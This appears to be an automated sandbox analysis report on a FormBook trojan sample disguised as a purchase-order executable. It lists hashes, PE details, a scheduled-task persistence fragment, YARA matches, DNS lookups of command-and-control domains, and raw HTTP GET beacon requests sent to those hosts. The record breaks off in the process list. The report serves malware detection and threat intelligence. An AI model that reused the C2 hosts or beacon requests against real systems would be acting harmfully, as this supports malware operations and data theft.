Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe

Download File

Process:	C:\Users\user\Desktop\po8909893299832.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	627208
Entropy (8bit):	7.956127025264682
Encrypted:	false
SSDEEP:	12288:xdJS4VayvR9/7MY12/bsozqhJf6fa8OGawEekrNYoAjjQkR:hScnpFxE/bsB3Si8OyTp3
MD5:	8C2635E6C2804ACE5C6FA487F5E23A87
SHA1:	334E05486EFDA6725B100A9365D5017AEFB90E22
SHA-256:	D6C03CCE5773652C4CB266084F901B331550D57A656240D20C288484657CD701
SHA-512:	25B40D504047BD3001303C59C72756D7174DC3B0E9731045E2A4CD57907333F4203AB8F2DE3F4B99FB96C6EF5217DAE764BFCCA980583F7375A39714B78DFFE6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,.Vf..............0..R..........2p... ........@.. ....................................@..................................o..O....................\...6...........Q..T............................................ ............... ..H............text...8P... ...R.................. ..`.rsrc................T..............@..@.reloc...............Z..............@..B.................p......H........T...P......&...0...............................................~.(.......r...p}.....r...p}......{...."..}......{...."..}.......0..Q.........}......}.....r...p}.....r...p}.....s....}.....s....}......}.....( ......(........0............{....o!.......{....o"....o#...o$......+....o%.... ......,....+....X...o&.........-.........,"..{.....o......{....r...po......++..{.......o'...o......{.......Xo(...o..........0............{....o!.....{....o"....o#...o$.....{....o.

C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\po8909893299832.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.956127025264682
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	po8909893299832.exe
File size:	627'208 bytes
MD5:	8c2635e6c2804ace5c6fa487f5e23a87
SHA1:	334e05486efda6725b100a9365d5017aefb90e22
SHA256:	d6c03cce5773652c4cb266084f901b331550d57a656240d20c288484657cd701
SHA512:	25b40d504047bd3001303c59c72756d7174dc3b0e9731045e2a4cd57907333f4203ab8f2de3f4b99fb96c6ef5217dae764bfcca980583f7375a39714b78dffe6
SSDEEP:	12288:xdJS4VayvR9/7MY12/bsozqhJf6fa8OGawEekrNYoAjjQkR:hScnpFxE/bsB3Si8OyTp3
TLSH:	43D4229423E49709E5BFAFF225709591CB71F212A818CD99ACC120EE2C9F3A11F16F57
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,.Vf..............0..R..........2p... ........@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x497032
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6656CB2C [Wed May 29 06:29:00 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/11/2018 01:00:00 09/11/2021 00:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x96fde	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x98000	0x594	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x95c00	0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x9a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x951b0	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x95038	0x95200	2000d69c9ed0468ae2da381c709b7f64	False	0.965788387992456	data	7.9631320059403645	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x98000	0x594	0x600	94a01ade994c7d2d1d12e7325c3f5b05	False	0.4127604166666667	data	4.036677836493152	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x9a000	0xc	0x200	06b82c1cb66bb5840f24be36f9a7bdef	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x98090	0x304	data			0.43134715025906734
RT_MANIFEST	0x983a4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/30/24-11:07:48.562948	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49715	80	192.168.2.8	103.224.212.212
05/30/24-11:10:38.980070	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49743	80	192.168.2.8	3.33.130.190
05/30/24-11:09:01.504499	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49729	80	192.168.2.8	34.92.138.115
05/30/24-11:09:58.198716	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49741	80	192.168.2.8	3.64.163.50
05/30/24-11:11:22.799011	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49756	80	192.168.2.8	188.114.97.3
05/30/24-11:09:18.671134	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49740	80	192.168.2.8	216.246.47.89
05/30/24-11:11:43.816589	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49757	80	192.168.2.8	72.14.178.174
05/30/24-11:10:18.476062	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49742	80	192.168.2.8	103.224.212.212
05/30/24-11:10:59.861628	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49749	80	192.168.2.8	205.134.241.76

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 30, 2024 11:07:48.557873011 CEST	49715	80	192.168.2.8	103.224.212.212
May 30, 2024 11:07:48.562843084 CEST	80	49715	103.224.212.212	192.168.2.8
May 30, 2024 11:07:48.562922001 CEST	49715	80	192.168.2.8	103.224.212.212
May 30, 2024 11:07:48.562947989 CEST	49715	80	192.168.2.8	103.224.212.212
May 30, 2024 11:07:48.567948103 CEST	80	49715	103.224.212.212	192.168.2.8
May 30, 2024 11:07:49.070594072 CEST	49715	80	192.168.2.8	103.224.212.212
May 30, 2024 11:07:49.075925112 CEST	80	49715	103.224.212.212	192.168.2.8
May 30, 2024 11:07:49.075988054 CEST	49715	80	192.168.2.8	103.224.212.212
May 30, 2024 11:09:01.499449968 CEST	49729	80	192.168.2.8	34.92.138.115
May 30, 2024 11:09:01.504373074 CEST	80	49729	34.92.138.115	192.168.2.8
May 30, 2024 11:09:01.504446030 CEST	49729	80	192.168.2.8	34.92.138.115
May 30, 2024 11:09:01.504498959 CEST	49729	80	192.168.2.8	34.92.138.115
May 30, 2024 11:09:01.509367943 CEST	80	49729	34.92.138.115	192.168.2.8
May 30, 2024 11:09:02.008569956 CEST	49729	80	192.168.2.8	34.92.138.115
May 30, 2024 11:09:02.056401014 CEST	80	49729	34.92.138.115	192.168.2.8
May 30, 2024 11:09:18.665731907 CEST	49740	80	192.168.2.8	216.246.47.89
May 30, 2024 11:09:18.670581102 CEST	80	49740	216.246.47.89	192.168.2.8
May 30, 2024 11:09:18.670774937 CEST	49740	80	192.168.2.8	216.246.47.89
May 30, 2024 11:09:18.671133995 CEST	49740	80	192.168.2.8	216.246.47.89
May 30, 2024 11:09:18.675940037 CEST	80	49740	216.246.47.89	192.168.2.8
May 30, 2024 11:09:19.179142952 CEST	49740	80	192.168.2.8	216.246.47.89
May 30, 2024 11:09:19.184417009 CEST	80	49740	216.246.47.89	192.168.2.8
May 30, 2024 11:09:19.184498072 CEST	49740	80	192.168.2.8	216.246.47.89
May 30, 2024 11:09:22.887016058 CEST	80	49729	34.92.138.115	192.168.2.8
May 30, 2024 11:09:22.887095928 CEST	49729	80	192.168.2.8	34.92.138.115
May 30, 2024 11:09:58.193730116 CEST	49741	80	192.168.2.8	3.64.163.50
May 30, 2024 11:09:58.198606014 CEST	80	49741	3.64.163.50	192.168.2.8
May 30, 2024 11:09:58.198663950 CEST	49741	80	192.168.2.8	3.64.163.50
May 30, 2024 11:09:58.198715925 CEST	49741	80	192.168.2.8	3.64.163.50
May 30, 2024 11:09:58.203547001 CEST	80	49741	3.64.163.50	192.168.2.8
May 30, 2024 11:09:58.703392982 CEST	49741	80	192.168.2.8	3.64.163.50
May 30, 2024 11:09:58.709343910 CEST	80	49741	3.64.163.50	192.168.2.8
May 30, 2024 11:09:58.709398031 CEST	49741	80	192.168.2.8	3.64.163.50
May 30, 2024 11:10:18.470016956 CEST	49742	80	192.168.2.8	103.224.212.212
May 30, 2024 11:10:18.475914001 CEST	80	49742	103.224.212.212	192.168.2.8
May 30, 2024 11:10:18.476000071 CEST	49742	80	192.168.2.8	103.224.212.212
May 30, 2024 11:10:18.476062059 CEST	49742	80	192.168.2.8	103.224.212.212
May 30, 2024 11:10:18.480927944 CEST	80	49742	103.224.212.212	192.168.2.8
May 30, 2024 11:10:18.984869957 CEST	49742	80	192.168.2.8	103.224.212.212
May 30, 2024 11:10:18.990721941 CEST	80	49742	103.224.212.212	192.168.2.8
May 30, 2024 11:10:18.990791082 CEST	49742	80	192.168.2.8	103.224.212.212

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 30, 2024 11:07:48.243767977 CEST	63620	53	192.168.2.8	1.1.1.1
May 30, 2024 11:07:48.556478977 CEST	53	63620	1.1.1.1	192.168.2.8
May 30, 2024 11:08:08.821434975 CEST	59261	53	192.168.2.8	1.1.1.1
May 30, 2024 11:08:08.852610111 CEST	53	59261	1.1.1.1	192.168.2.8
May 30, 2024 11:08:28.774722099 CEST	64855	53	192.168.2.8	1.1.1.1
May 30, 2024 11:08:28.786084890 CEST	53	64855	1.1.1.1	192.168.2.8
May 30, 2024 11:08:52.680942059 CEST	61937	53	192.168.2.8	1.1.1.1
May 30, 2024 11:09:00.884000063 CEST	57426	53	192.168.2.8	1.1.1.1
May 30, 2024 11:09:01.498754978 CEST	53	57426	1.1.1.1	192.168.2.8
May 30, 2024 11:09:18.289882898 CEST	53325	53	192.168.2.8	1.1.1.1
May 30, 2024 11:09:18.664419889 CEST	53	53325	1.1.1.1	192.168.2.8
May 30, 2024 11:09:38.891711950 CEST	54381	53	192.168.2.8	1.1.1.1
May 30, 2024 11:09:38.926671982 CEST	53	54381	1.1.1.1	192.168.2.8
May 30, 2024 11:09:58.157428026 CEST	53865	53	192.168.2.8	1.1.1.1
May 30, 2024 11:09:58.193213940 CEST	53	53865	1.1.1.1	192.168.2.8
May 30, 2024 11:10:38.940562963 CEST	62599	53	192.168.2.8	1.1.1.1
May 30, 2024 11:10:38.968661070 CEST	53	62599	1.1.1.1	192.168.2.8
May 30, 2024 11:10:59.564513922 CEST	60736	53	192.168.2.8	1.1.1.1
May 30, 2024 11:10:59.853641987 CEST	53	60736	1.1.1.1	192.168.2.8
May 30, 2024 11:11:22.774696112 CEST	53968	53	192.168.2.8	1.1.1.1
May 30, 2024 11:11:22.793411970 CEST	53	53968	1.1.1.1	192.168.2.8
May 30, 2024 11:11:43.462136030 CEST	63378	53	192.168.2.8	1.1.1.1
May 30, 2024 11:11:43.810600996 CEST	53	63378	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 30, 2024 11:07:48.243767977 CEST	192.168.2.8	1.1.1.1	0xd58f	Standard query (0)	www.trexendofparadise.club	A (IP address)	IN (0x0001)	false
May 30, 2024 11:08:08.821434975 CEST	192.168.2.8	1.1.1.1	0x6831	Standard query (0)	www.thingsidonaked.com	A (IP address)	IN (0x0001)	false
May 30, 2024 11:08:28.774722099 CEST	192.168.2.8	1.1.1.1	0x81a8	Standard query (0)	www.lorenzodavissr.com	A (IP address)	IN (0x0001)	false
May 30, 2024 11:08:52.680942059 CEST	192.168.2.8	1.1.1.1	0x173e	Standard query (0)	api.msn.com	A (IP address)	IN (0x0001)	false
May 30, 2024 11:09:00.884000063 CEST	192.168.2.8	1.1.1.1	0xb314	Standard query (0)	www.1509068.cc	A (IP address)	IN (0x0001)	false
May 30, 2024 11:09:18.289882898 CEST	192.168.2.8	1.1.1.1	0x6123	Standard query (0)	www.musiletras.co	A (IP address)	IN (0x0001)	false
May 30, 2024 11:09:38.891711950 CEST	192.168.2.8	1.1.1.1	0x18f0	Standard query (0)	www.connect-talent.com	A (IP address)	IN (0x0001)	false
May 30, 2024 11:09:58.157428026 CEST	192.168.2.8	1.1.1.1	0xabd3	Standard query (0)	www.blogonrunning.com	A (IP address)	IN (0x0001)	false
May 30, 2024 11:10:38.940562963 CEST	192.168.2.8	1.1.1.1	0xd1c2	Standard query (0)	www.system.ngo	A (IP address)	IN (0x0001)	false
May 30, 2024 11:10:59.564513922 CEST	192.168.2.8	1.1.1.1	0x1121	Standard query (0)	www.vagabondtracks.com	A (IP address)	IN (0x0001)	false
May 30, 2024 11:11:22.774696112 CEST	192.168.2.8	1.1.1.1	0x1319	Standard query (0)	www.damtherncooling.com	A (IP address)	IN (0x0001)	false
May 30, 2024 11:11:43.462136030 CEST	192.168.2.8	1.1.1.1	0x6780	Standard query (0)	www.attack.info	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 30, 2024 11:07:48.556478977 CEST	1.1.1.1	192.168.2.8	0xd58f	No error (0)	www.trexendofparadise.club		103.224.212.212	A (IP address)	IN (0x0001)	false
May 30, 2024 11:08:08.852610111 CEST	1.1.1.1	192.168.2.8	0x6831	Name error (3)	www.thingsidonaked.com	none	none	A (IP address)	IN (0x0001)	false
May 30, 2024 11:08:28.786084890 CEST	1.1.1.1	192.168.2.8	0x81a8	Name error (3)	www.lorenzodavissr.com	none	none	A (IP address)	IN (0x0001)	false
May 30, 2024 11:08:52.688124895 CEST	1.1.1.1	192.168.2.8	0x173e	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
May 30, 2024 11:09:01.498754978 CEST	1.1.1.1	192.168.2.8	0xb314	No error (0)	www.1509068.cc		34.92.138.115	A (IP address)	IN (0x0001)	false
May 30, 2024 11:09:18.664419889 CEST	1.1.1.1	192.168.2.8	0x6123	No error (0)	www.musiletras.co	musiletras.co		CNAME (Canonical name)	IN (0x0001)	false
May 30, 2024 11:09:18.664419889 CEST	1.1.1.1	192.168.2.8	0x6123	No error (0)	musiletras.co		216.246.47.89	A (IP address)	IN (0x0001)	false
May 30, 2024 11:09:38.926671982 CEST	1.1.1.1	192.168.2.8	0x18f0	Name error (3)	www.connect-talent.com	none	none	A (IP address)	IN (0x0001)	false
May 30, 2024 11:09:58.193213940 CEST	1.1.1.1	192.168.2.8	0xabd3	No error (0)	www.blogonrunning.com		3.64.163.50	A (IP address)	IN (0x0001)	false
May 30, 2024 11:10:38.968661070 CEST	1.1.1.1	192.168.2.8	0xd1c2	No error (0)	www.system.ngo	system.ngo		CNAME (Canonical name)	IN (0x0001)	false
May 30, 2024 11:10:38.968661070 CEST	1.1.1.1	192.168.2.8	0xd1c2	No error (0)	system.ngo		3.33.130.190	A (IP address)	IN (0x0001)	false
May 30, 2024 11:10:38.968661070 CEST	1.1.1.1	192.168.2.8	0xd1c2	No error (0)	system.ngo		15.197.148.33	A (IP address)	IN (0x0001)	false
May 30, 2024 11:10:59.853641987 CEST	1.1.1.1	192.168.2.8	0x1121	No error (0)	www.vagabondtracks.com	vagabondtracks.com		CNAME (Canonical name)	IN (0x0001)	false
May 30, 2024 11:10:59.853641987 CEST	1.1.1.1	192.168.2.8	0x1121	No error (0)	vagabondtracks.com		205.134.241.76	A (IP address)	IN (0x0001)	false
May 30, 2024 11:11:22.793411970 CEST	1.1.1.1	192.168.2.8	0x1319	No error (0)	www.damtherncooling.com		188.114.97.3	A (IP address)	IN (0x0001)	false
May 30, 2024 11:11:22.793411970 CEST	1.1.1.1	192.168.2.8	0x1319	No error (0)	www.damtherncooling.com		188.114.96.3	A (IP address)	IN (0x0001)	false
May 30, 2024 11:11:43.810600996 CEST	1.1.1.1	192.168.2.8	0x6780	No error (0)	www.attack.info		72.14.178.174	A (IP address)	IN (0x0001)	false
May 30, 2024 11:11:43.810600996 CEST	1.1.1.1	192.168.2.8	0x6780	No error (0)	www.attack.info		72.14.185.43	A (IP address)	IN (0x0001)	false
May 30, 2024 11:11:43.810600996 CEST	1.1.1.1	192.168.2.8	0x6780	No error (0)	www.attack.info		45.56.79.23	A (IP address)	IN (0x0001)	false
May 30, 2024 11:11:43.810600996 CEST	1.1.1.1	192.168.2.8	0x6780	No error (0)	www.attack.info		45.33.18.44	A (IP address)	IN (0x0001)	false
May 30, 2024 11:11:43.810600996 CEST	1.1.1.1	192.168.2.8	0x6780	No error (0)	www.attack.info		45.33.30.197	A (IP address)	IN (0x0001)	false
May 30, 2024 11:11:43.810600996 CEST	1.1.1.1	192.168.2.8	0x6780	No error (0)	www.attack.info		45.33.20.235	A (IP address)	IN (0x0001)	false
May 30, 2024 11:11:43.810600996 CEST	1.1.1.1	192.168.2.8	0x6780	No error (0)	www.attack.info		45.33.2.79	A (IP address)	IN (0x0001)	false
May 30, 2024 11:11:43.810600996 CEST	1.1.1.1	192.168.2.8	0x6780	No error (0)	www.attack.info		173.255.194.134	A (IP address)	IN (0x0001)	false
May 30, 2024 11:11:43.810600996 CEST	1.1.1.1	192.168.2.8	0x6780	No error (0)	www.attack.info		45.33.23.183	A (IP address)	IN (0x0001)	false
May 30, 2024 11:11:43.810600996 CEST	1.1.1.1	192.168.2.8	0x6780	No error (0)	www.attack.info		198.58.118.167	A (IP address)	IN (0x0001)	false
May 30, 2024 11:11:43.810600996 CEST	1.1.1.1	192.168.2.8	0x6780	No error (0)	www.attack.info		45.79.19.196	A (IP address)	IN (0x0001)	false
May 30, 2024 11:11:43.810600996 CEST	1.1.1.1	192.168.2.8	0x6780	No error (0)	www.attack.info		96.126.123.244	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.trexendofparadise.club

www.1509068.cc

www.musiletras.co

www.blogonrunning.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49715	103.224.212.212	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 11:07:48.562947989 CEST	176	OUT	GET /hd05/?uPj8E=nj80vJyxN81&MZd0Q=86lIbpVB0TF+ypCCh2xJS80hbaRwufvG1BxjW4BS/DAeytVMDvWI/cAJk8pGccQXRyse HTTP/1.1 Host: www.trexendofparadise.club Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49729	34.92.138.115	80	8072	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 11:09:01.504498959 CEST	159	OUT	GET /hd05/?mJBXxJ=CxPotulfGBZpHIJJ+o6FWq7i3UE5pskzkmOOhBcvrWJlnc+WUQ0RkkLk4n95vg0rlezt&_hrl=jxopsZ HTTP/1.1 Host: www.1509068.cc Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49740	216.246.47.89	80	8072	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 11:09:18.671133995 CEST	162	OUT	GET /hd05/?mJBXxJ=1/AoRKsyvPXt2IBcGLParC7mpiczmRTxS/g2b9eKRAccwmv6VWNs1AH0d5Vdc3+Ur6jA&_hrl=jxopsZ HTTP/1.1 Host: www.musiletras.co Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49741	3.64.163.50	80	8072	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 11:09:58.198715925 CEST	166	OUT	GET /hd05/?mJBXxJ=L307NeH5fWkLgKK43su7TNgrL3oq/VFX5jHnogZ3Xy90kbIeezXbjunmo4QVhDvcCpqA&_hrl=jxopsZ HTTP/1.1 Host: www.blogonrunning.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49742	103.224.212.212	80	8072	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 11:10:18.476062059 CEST	171	OUT	GET /hd05/?mJBXxJ=86lIbpVB0TF+ypCCh2xJS80hbaRwufvG1BxjW4BS/DAeytVMDvWI/cAJk8pGccQXRyse&_hrl=jxopsZ HTTP/1.1 Host: www.trexendofparadise.club Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Target ID:	0
Start time:	05:07:04
Start date:	30/05/2024
Path:	C:\Users\user\Desktop\po8909893299832.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\po8909893299832.exe"
Imagebase:	0x30000
File size:	627'208 bytes
MD5 hash:	8C2635E6C2804ACE5C6FA487F5E23A87
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1449357318.0000000003809000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1449357318.0000000003809000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1449357318.0000000003809000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1449357318.0000000003809000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1449357318.0000000003809000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1449357318.0000000004101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1449357318.0000000004101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1449357318.0000000004101000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1449357318.0000000004101000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1449357318.0000000004101000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:07:06
Start date:	30/05/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
